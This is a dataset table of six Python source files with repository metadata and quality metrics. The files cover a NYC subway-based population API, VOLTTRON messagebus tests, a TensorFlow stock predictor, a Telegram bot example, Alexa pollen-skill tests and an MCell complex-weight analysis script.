hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0b37c0420054561917f45cadbbccdd95c452e6a4 | 3,272 | py | Python | dynamicPopulation.py | PeterJWei/CitywideFootprinting | 98064e6119ceab26079c0b11629f3d428f4e745f | [
"MIT"
] | 1 | 2019-01-25T16:01:57.000Z | 2019-01-25T16:01:57.000Z | dynamicPopulation.py | PeterJWei/CitywideFootprinting | 98064e6119ceab26079c0b11629f3d428f4e745f | [
"MIT"
] | 1 | 2018-10-31T18:33:07.000Z | 2018-10-31T18:38:57.000Z | dynamicPopulation.py | PeterJWei/CitywideFootprinting | 98064e6119ceab26079c0b11629f3d428f4e745f | [
"MIT"
] | 1 | 2018-12-24T23:35:15.000Z | 2018-12-24T23:35:15.000Z | from Remote2StopID import remoteDictionary
from buildingData import buildingData
from plotNYCblocks import plotNYCblocks
from loadEnergy import loadEnergy
import time
import web
from subwayStream import subwayStream
urls = ("/", "dynamicAPI")
class dynamicAPI:
def GET(self):
self.dynamic = showDynamicPopulation()
print("dynamic API")
return self.dynamic.serviceStartup()
class showDynamicPopulation:
def __init__(self, borough=0): # borough options: 0, all boroughs; 1, Manhattan
self.init(borough)
self.borough = borough
return
def init(self, borough=0):
self.MTAstream = subwayStream()
E = loadEnergy()
self.energyDictionary = E.energyDictionary
S = remoteDictionary()
B = buildingData()
self.BBL2CT = B.BBL2CT
self.CT2EUI()
#S = subwayStream()
self.blocks2Occupancy = {}
boroughFileName = {0:"AllBoroughs",
1:"Manhattan",
2:"Bronx",
3:"Brooklyn",
4:"Queens",
5:"Staten Island"}
print("Determining Closest Station...")
start = time.time()
self.nearestStation = B.closestStation(S.coordinates, borough, boroughFileName[borough])
end = time.time()
print("Finished: " + str(end-start) + " s\n")
print("Inverting Closest Station...")
start = time.time()
self.station2Blocks = B.station2Blocks()
end = time.time()
print("Finished: " + str(end-start) + " s\n")
self.timeSeriesEntries = S.timeSeriesDataEntries
self.timeSeriesExits = S.timeSeriesDataExits
def CT2EUI(self):
self.CTEUI = {}
for BBL in self.energyDictionary:
if BBL in self.BBL2CT:
block = self.BBL2CT[BBL]
if block not in self.CTEUI:
self.CTEUI[block] = 0.0
self.CTEUI[block] += self.energyDictionary[BBL]
def getBlocks2Occupancy(self,t):
self.blocks2Occupancy = {}
stationTrains = self.MTAstream.getData(0x1FF)
for station in stationTrains:
print(str(stationTrains[station]) + " trains passed station: " + station)
count = 0
for station in stationTrains:
#Trainslate s to station
#TODO
if station not in self.station2Blocks:
#print("No station: " + str(station) + " found")
continue
#for station in self.station2Blocks:
blockCount = len(self.station2Blocks[station])
for block in self.station2Blocks[station]:
if block not in self.blocks2Occupancy:
self.blocks2Occupancy[block] = 0
if station in self.timeSeriesEntries:
entryDiff = self.timeSeriesEntries[station][t] - self.timeSeriesEntries[station][t-1]
exitDiff = self.timeSeriesExits[station][t] - self.timeSeriesExits[station][t-1]
if entryDiff > 100000 or exitDiff > 100000 or entryDiff < 0 or exitDiff < 0:
continue
count += 1
self.blocks2Occupancy[block] += (exitDiff - entryDiff)/blockCount/48
print("Number of nonzero changes: " + str(count) + "/" + str(len(self.blocks2Occupancy)))
def plotRealtime(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
self.P.examplePlotRealTime(self.blocks2Occupancy)
def startup(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
#self.P.testRun()
self.P.exampleRun()
def plotDynamic(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
self.P.dynamicPopulation(self.blocks2Occupancy)
self.P.examplePlot2()
doPopulation = web.application(urls, locals()); | 31.161905 | 91 | 0.709352 | 380 | 3,272 | 6.097368 | 0.289474 | 0.069055 | 0.022443 | 0.028485 | 0.149763 | 0.119551 | 0.092792 | 0.092792 | 0.092792 | 0.092792 | 0 | 0.021355 | 0.169927 | 3,272 | 105 | 92 | 31.161905 | 0.831738 | 0.057763 | 0 | 0.176471 | 0 | 0 | 0.068921 | 0 | 0 | 0 | 0.001625 | 0.009524 | 0 | 1 | 0.094118 | false | 0.011765 | 0.082353 | 0 | 0.223529 | 0.082353 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b3a0ab12489d76c49cc26a0b84fe4771008019a | 3,153 | py | Python | volttrontesting/testutils/test_multimessagebus_fixture.py | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | null | null | null | volttrontesting/testutils/test_multimessagebus_fixture.py | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | null | null | null | volttrontesting/testutils/test_multimessagebus_fixture.py | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | null | null | null | import pytest
import requests
@pytest.fixture
def web_bound_correctly(volttron_multi_messagebus):
source, sink = volttron_multi_messagebus
assert sink.bind_web_address, "Sink should always have a web enabled"
assert not source.bind_web_address, "Source should never have a web enabled"
yield source, sink
def test_correct_number_of_instances(web_bound_correctly):
source, sink = web_bound_correctly
if source.messagebus == 'rmq':
assert source.ssl_auth, "source must be ssl enabled for rmq"
if sink.messagebus == 'rmq':
assert sink.ssl_auth, "sink must be ssl enabled for rmq"
def test_correct_remote_ca_specified(web_bound_correctly):
source, sink = web_bound_correctly
if sink.messagebus == 'rmq':
assert source.requests_ca_bundle
with open(source.requests_ca_bundle) as f:
requests_ca_content = f.read()
data = sink.certsobj.ca_cert(public_bytes=True)
assert data in requests_ca_content
if source.messagebus == 'zmq':
assert data == requests_ca_content
if source.messagebus == 'rmq':
assert data != source.certsobj.ca_cert(public_bytes=True)
def test_can_connect_web_using_remote_platform_ca(web_bound_correctly):
source, sink = web_bound_correctly
# Note we are using the sources.requests_ca_bundle not the sinks ca
# This way we know we are testing the transference from one to the other
print("source requests_ca_bundle", source.requests_ca_bundle)
if sink.messagebus == 'rmq':
print("sink certs_filename", sink.certsobj.cert_file(sink.certsobj.root_ca_name))
# these two lines enable debugging at httplib level (requests->urllib3->httplib)
# you will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.
# the only thing missing will be the response.body which is not logged.
import httplib
httplib.HTTPConnection.debuglevel = 1
resp = requests.get(sink.discovery_address, verify=source.requests_ca_bundle)
assert resp.ok
assert resp.headers['Content-Type'] == 'application/json'
def test_instance_config_matches_instance(web_bound_correctly):
source, sink = web_bound_correctly
def config_file_correct(instance):
import os
from ConfigParser import ConfigParser
config_file = os.path.join(instance.volttron_home, "config")
assert os.path.isfile(config_file)
parser = ConfigParser()
# with open(config_file, 'rb') as cfg:
parser.read(config_file)
assert instance.instance_name == parser.get('volttron', 'instance-name')
assert instance.vip_address == parser.get('volttron', 'vip-address')
assert instance.messagebus == parser.get('volttron', 'message-bus')
if instance.bind_web_address:
assert instance.bind_web_address == parser.get('volttron', 'bind-web-address')
if instance.volttron_central_address:
assert instance.volttron_central_address == parser.get('volttron', 'volttron-central-address')
config_file_correct(source)
config_file_correct(sink)
| 36.241379 | 106 | 0.719949 | 418 | 3,153 | 5.203349 | 0.315789 | 0.033103 | 0.070345 | 0.050575 | 0.19954 | 0.161839 | 0.082759 | 0.082759 | 0.042299 | 0 | 0 | 0.000791 | 0.19759 | 3,153 | 86 | 107 | 36.662791 | 0.858893 | 0.133206 | 0 | 0.166667 | 0 | 0 | 0.129174 | 0.008807 | 0 | 0 | 0 | 0 | 0.296296 | 1 | 0.111111 | false | 0 | 0.092593 | 0 | 0.203704 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b3a8bc4c58910a6e5bfbc9c5f22472ed0ddf659 | 7,258 | py | Python | StockTrainer/SingleStockTrainer.py | mslovy/starry | c5a4c7942e1fc3ad1f4a4ee8c004d91c51e1b9f9 | [
"Apache-2.0"
] | null | null | null | StockTrainer/SingleStockTrainer.py | mslovy/starry | c5a4c7942e1fc3ad1f4a4ee8c004d91c51e1b9f9 | [
"Apache-2.0"
] | null | null | null | StockTrainer/SingleStockTrainer.py | mslovy/starry | c5a4c7942e1fc3ad1f4a4ee8c004d91c51e1b9f9 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
import pandas as pd
import numpy
hist_data = pd.read_csv("000423_hist_data_new.csv")
basics_data = pd.read_csv("000423_basics.csv", encoding="gbk")
num_test = 10
hist_data = hist_data.drop('date',axis=1)
hist_data = hist_data.drop('price_change', axis=1)
hist_data = hist_data.drop('turnover', axis=1)
highest_price = max(hist_data['high'])
lowest_price = min(hist_data['low'])
maxvol = max(hist_data['volume'])
lowvol = min(hist_data['volume'])
hist_data['open'] = (2*hist_data['open'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['high'] = (2*hist_data['high'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['close'] = (2*hist_data['close'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['low'] = (2*hist_data['low'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma5'] = (2*hist_data['ma5'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma10'] = (2*hist_data['ma10'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma20'] = (2*hist_data['ma20'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['volume'] = (2*hist_data['volume'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma5'] = (2*hist_data['v_ma5'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma10'] = (2*hist_data['v_ma10'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma20'] = (2*hist_data['v_ma20'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['p_change'] = hist_data['p_change']/10
p_data = hist_data['p_change']
hist_data['pr_change'] = p_data[:-1]
dpr_change = hist_data['pr_change']
dpr_change[1:] = dpr_change[:-1]
dpr_change[0] = 0
training_set = hist_data.tail(hist_data.shape[0] - num_test)
testing_set = hist_data.head(num_test)
# 超参数设定
learning_rate = 0.0000001
training_epochs = 10000
batch_size = 50
display_step = 1
examples_to_show = 10
# 神经网络参数设定
n_hidden_1 = 50000 # 1st layer num features
n_hidden_2 = 5000 # 2nd layer num features
n_input = 12
n_output = 1
# tf 计算图输入
X = tf.placeholder("float", [None, n_input])
Y = tf.placeholder("float", [None])
weights = {
'w1': tf.get_variable("W1", shape=[n_input, n_hidden_1],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
'w2': tf.get_variable("W2", shape=[n_hidden_1, n_hidden_2],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
# 'w3': tf.get_variable("W3", shape=[n_hidden_2, n_hidden_3],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
'w4': tf.get_variable("W4", shape=[n_hidden_2, n_output],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
}
biases = {
'w1': tf.get_variable("b1", shape=[n_hidden_1],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
'w2': tf.get_variable("b2", shape=[n_hidden_2],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
# 'w3': tf.get_variable("b3", shape=[n_hidden_3],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
'w4': tf.get_variable("b4", shape=[n_output],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
}
# 搭建encoder
def encoder(x):
# 隐层使用sigmoid激励函数 #1
layer_1 = tf.nn.tanh(tf.add(tf.matmul(x, weights['w1']),
biases['w1']))
layer_1 = tf.nn.dropout(layer_1, keep_prob=0.5)
# 隐层使用sigmoid激励函数 #2
layer_2 = tf.nn.tanh(tf.add(tf.matmul(layer_1, weights['w2']),
biases['w2']))
layer_2 = tf.nn.dropout(layer_2, keep_prob=0.5)
# layer_3 = tf.nn.tanh(tf.add(tf.matmul(layer_2, weights['w3']),
# biases['w3']))
# layer_3 = tf.nn.dropout(layer_3, keep_prob=0.5)
layer_4 = tf.nn.tanh(tf.add(tf.matmul(layer_2, weights['w4']),
biases['w4']))
#layer_final = tf.abs(tf.multiply(tf.subtract(layer_4 - y),0.5))
return layer_4
# 搭建模型
encoder_op = encoder(X)
# 预测
y_pred = encoder_op
# Targets (Labels) are the input data.
y_true = Y
#y_diff_true = tf.multiply(tf.abs(y_pred - y_true), 1/y_true)
# Define loss and optimizer, minimize the squared error
cost = tf.reduce_sum(tf.pow(y_pred - y_true, 2))
#cost = tf.reduce_sum(y_diff_true)
#cost = tf.reduce_mean(-tf.reduce_sum(y_true*tf.log(y_pred) + (1-y_true)*tf.log(1-y_pred), reduction_indices=1))
#optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)
# Initializing the variables
init = tf.initialize_all_variables()
# Launch the graph
# Using InteractiveSession (more convenient while using Notebooks)
sess = tf.InteractiveSession()
sess.run(init)
total_batch = int((training_set.shape[0])/batch_size)
def shuffe_data(data):
perm = numpy.arange(data.shape[0])
numpy.random.shuffle(perm)
return data.iloc[perm,:]
def next_batch(data, index):
start = batch_size * index
end = batch_size * (index+1)
data_x = data.iloc[start:end,:-1]
data_y = data['pr_change'].iloc[start:end]
return data_x, data_y
def predict_samples():
testX = training_set.iloc[:, :-1]
testY = training_set['pr_change']
predict_result = sess.run(
y_pred, feed_dict={X: testX})
predict_result = numpy.reshape(predict_result,(predict_result.size,))
#print(predict_result)
#print(predict_result)
#print(testY)
predict_diff = abs(predict_result - testY)
#print(predict_diff)
best_predict = predict_diff[predict_diff < 0.15]
print("samples accuracy: %s", best_predict.size / predict_diff.size)
def predict():
testX = testing_set.iloc[1:, :-1]
#print(testX)
testY = testing_set['pr_change'].iloc[1:]
predict_result = sess.run(
y_pred, feed_dict={X: testX})
#myw1 = sess.run(weights['w1'])
#print(myw1)
predict_result = numpy.reshape(predict_result,(predict_result.size,))
print(predict_result)
#print(testY)
predict_diff = abs(predict_result - testY)
#print(predict_diff.values)
best_predict = predict_diff[predict_diff < 0.15]
#print(predict_result)
#print(testY.values)
print("accuracy: %s", best_predict.size / predict_diff.size)
# Training cycle
for epoch in range(training_epochs):
# Loop over all batches
shuffed_data = shuffe_data(hist_data)
for i in range(total_batch):
batch_xs, batch_ys = next_batch(shuffed_data, i)
# Run optimization op (backprop) and cost op (to get loss value)
_, c = sess.run([optimizer, cost], feed_dict={X: batch_xs, Y: batch_ys})
# Display logs per epoch step
if epoch % display_step == 0:
print("Epoch:", '%04d' % (epoch+1),
"cost=", "{:.9f}".format(c))
# prediction
if epoch % 10 == 0:
predict_samples()
predict()
print("Optimization Finished!")
# Applying encode and decode over test set
predict()
# Compare original images with their reconstructions
#f, a = plt.subplots(2, 10, figsize=(10, 2))
#for i in range(examples_to_show):
# a[0][i].imshow(np.reshape(mnist.test.images[i], (28, 28)))
# a[1][i].imshow(np.reshape(encode_decode[i], (28, 28)))
#f.show()
#plt.draw()
#plt.waitforbuttonpress()
| 37.220513 | 129 | 0.689584 | 1,087 | 7,258 | 4.360626 | 0.216191 | 0.072574 | 0.050211 | 0.043882 | 0.413291 | 0.364557 | 0.349789 | 0.313924 | 0.284388 | 0.243038 | 0 | 0.031545 | 0.152659 | 7,258 | 194 | 130 | 37.412371 | 0.739187 | 0.239598 | 0 | 0.105263 | 0 | 0 | 0.068972 | 0.004391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04386 | false | 0 | 0.026316 | 0 | 0.096491 | 0.04386 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b3bd7166d35e352ac93bac0df14cc8e152f191c | 1,161 | py | Python | example.py | Henrik168/TelegramBot | 6b11fc47218d616f1a4acfe7ac6494cb802491b9 | [
"MIT"
] | null | null | null | example.py | Henrik168/TelegramBot | 6b11fc47218d616f1a4acfe7ac6494cb802491b9 | [
"MIT"
] | null | null | null | example.py | Henrik168/TelegramBot | 6b11fc47218d616f1a4acfe7ac6494cb802491b9 | [
"MIT"
] | null | null | null | import time
import config
from TelegramBot.TelegramThread import TelegramThread, TelegramBot, MessageData
import CustomLogger
def hello(str_message: MessageData, bot: TelegramBot):
bot.send_text(message="Hello dude!", chatroom_id=str_message.chatroom_id)
def reply_time(str_message: MessageData, bot: TelegramBot):
bot.send_text(message=f"It is: {time.time()}", chatroom_id=str_message.chatroom_id)
def main():
logger = CustomLogger.getLogger(level=10)
telegram_thread = TelegramThread(bot_token=config.bot_token,
chatroom_id=config.chatroom_id,
logger=logger)
telegram_thread.register_command("/hello", hello)
telegram_thread.register_command("/time", reply_time)
telegram_thread.start()
telegram_thread.send_text(message="test")
"""with open("data/screenshot.png", "rb") as f:
image = f.read()
telegram_thread.send_photo(file=image)"""
while True:
message = telegram_thread.request_message()
if message:
print(message)
time.sleep(0.1)
pass
if __name__ == "__main__":
main()
| 29.025 | 87 | 0.674419 | 136 | 1,161 | 5.492647 | 0.404412 | 0.131191 | 0.060241 | 0.064257 | 0.230254 | 0.230254 | 0.230254 | 0.141901 | 0.141901 | 0 | 0 | 0.00441 | 0.218777 | 1,161 | 39 | 88 | 29.769231 | 0.819184 | 0 | 0 | 0 | 0 | 0 | 0.051823 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0.04 | 0.16 | 0 | 0.28 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b3d11a7cd22298f514bc2289b44b365ddb9698b | 2,058 | py | Python | tests/test_location_request_intent_handler.py | bazwilliams/pollen-count | 48987d0b642f9bb3c6f5a35178f4bd035bd83302 | [
"MIT"
] | 1 | 2017-07-13T07:23:29.000Z | 2017-07-13T07:23:29.000Z | tests/test_location_request_intent_handler.py | bazwilliams/pollen-count | 48987d0b642f9bb3c6f5a35178f4bd035bd83302 | [
"MIT"
] | 2 | 2018-05-02T14:29:51.000Z | 2020-04-22T15:59:51.000Z | tests/test_location_request_intent_handler.py | bazwilliams/pollen-count | 48987d0b642f9bb3c6f5a35178f4bd035bd83302 | [
"MIT"
] | null | null | null | import unittest
import os
import mock
import handler as sut
class fakeLocation():
@property
def latitude(self):
return 55.8642
@property
def longitude(self):
return -4.2518
class TestLocationRequestIntentHandler(unittest.TestCase):
@mock.patch.object(sut.Pollen, 'pollencount', "Awful")
@mock.patch.object(sut.Nominatim, 'geocode', lambda self, city: fakeLocation())
def setUp(self):
os.environ['SKILL_ID'] = "TEST_SKILL_ID"
self.context = {}
self.event = {
'session': {
'sessionId': 'unittest',
'application': {
'applicationId': "TEST_SKILL_ID"
}
},
'request': {
'requestId': 'test-locationrequest',
'type': 'IntentRequest',
'intent': {
'name': 'LocationRequestIntent',
'slots': {
'Location': {
'name': 'Location',
'value': 'glasgow'
}
}
}
},
'context':{}
}
self.result = sut.lambda_handler(self.event, self.context)
def testOutputSpeech(self):
self.assertEqual(
self.result['response']['outputSpeech'],
{
'text': "Today in glasgow, the Pollen Count is Awful",
'type': "PlainText"})
def testCard(self):
self.assertEqual(
self.result['response']['card'],
{
'title': "Pollen Count",
'content': "Today in glasgow, the Pollen Count is Awful",
'type': "Simple"})
def testShouldEndSession(self):
self.assertTrue(self.result['response']['shouldEndSession'])
def testResponse(self):
self.assertEqual(self.result['sessionAttributes'], {})
self.assertEqual(self.result['version'], "1.0")
if __name__ == "__main__":
unittest.main()
| 29.826087 | 83 | 0.499028 | 166 | 2,058 | 6.10241 | 0.481928 | 0.05923 | 0.075025 | 0.098717 | 0.178677 | 0.150049 | 0.076999 | 0.076999 | 0.076999 | 0 | 0 | 0.01007 | 0.372692 | 2,058 | 68 | 84 | 30.264706 | 0.774593 | 0 | 0 | 0.066667 | 0 | 0 | 0.224004 | 0.010204 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.116667 | false | 0 | 0.066667 | 0.033333 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b3d52871483e77014ee2a49952cad4bd97a107c | 2,820 | py | Python | utils/bng_analyzer_py/bng_analysis_example.py | mcellteam/mcell | 3920aec22c55013b78f7d6483b81f70a0d564d22 | [
"MIT"
] | 25 | 2015-03-25T16:36:01.000Z | 2022-01-17T14:28:43.000Z | utils/bng_analyzer_py/bng_analysis_example.py | mcellteam/mcell | 3920aec22c55013b78f7d6483b81f70a0d564d22 | [
"MIT"
] | 31 | 2015-02-12T22:15:18.000Z | 2022-03-30T22:43:24.000Z | utils/bng_analyzer_py/bng_analysis_example.py | mcellteam/mcell | 3920aec22c55013b78f7d6483b81f70a0d564d22 | [
"MIT"
] | 12 | 2016-01-15T23:20:19.000Z | 2021-02-10T06:18:00.000Z | """
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to [http://unlicense.org]
"""
import sys
import os
import pandas as pd
MCELL_PATH = os.environ.get('MCELL_PATH', '')
if MCELL_PATH:
sys.path.append(os.path.join(MCELL_PATH, 'lib'))
else:
print("Error: variable MCELL_PATH that is used to find the mcell library was not set.")
sys.exit(1)
import mcell as m
# utility module to load ASCII viz_output .dat file from
import viz_reader
# arbitrary values are used here
WEIGHTS = {
'ampar_tarp': 1.5,
'psd95': 2.5,
'syngap': 3.5,
}
def analyze_dat_file(file_name):
# read the .dat file and parse complexes to the internal MCell
# representation
complex_counts = viz_reader.read_dat_file(file_name)
#print(complex_counts[0][0])
#print(complex_counts[0][1])
# process the read data
for (complex, count) in complex_counts:
weight = 0.0
# iterate over elementary molecules from which the
# complex is composed
for mi in complex.elementary_molecules:
name = mi.elementary_molecule_type.name
if name not in WEIGHTS:
print("Error: unknown molecular weight of " + name)
sys.exit(1)
weight += WEIGHTS[name]
print("----------------------------------")
print(complex.to_bngl_str())
print("")
print("weight: " + str(weight) + ", copy nr.: " + str(count))
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Expected .dat file name as argument")
sys.exit(1)
analyze_dat_file(sys.argv[1])
| 32.045455 | 91 | 0.676596 | 409 | 2,820 | 4.581907 | 0.466993 | 0.022412 | 0.012807 | 0.016009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008862 | 0.239716 | 2,820 | 88 | 92 | 32.045455 | 0.865205 | 0.539362 | 0 | 0.085714 | 0 | 0 | 0.190031 | 0.02648 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.142857 | 0 | 0.171429 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
